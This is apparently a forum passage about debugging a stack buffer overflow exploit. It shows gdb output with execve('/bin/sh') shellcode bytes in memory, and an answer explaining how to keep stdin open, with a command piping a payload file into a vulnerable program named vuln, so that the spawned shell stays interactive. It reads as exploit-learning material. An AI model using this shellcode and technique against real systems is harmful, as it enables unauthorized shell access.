0xbfffef10: "ë\v[1À1É1Ò°\vÍ\200èð\377\377\377/bin/sh"
gdb$ si
process 3697 is executing new program: /bin/bash
Error in re-setting breakpoint 1: No symbol table is loaded. Use the "file" command.
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[Inferior 1 (process 3697) exited normally]
--------------------------------------------------------------------------[regs]
EAX:Error while running hook_stop:
No registers.
As you can see in debugger the shell is start and exit at the moment. When I used strcpy it start shell and not exit
There is a difference of behaviour between strcpy and gets.
You should try using something like this in order to let the stdin open :
(cat /tmp/yourbuffer;cat) | ./vuln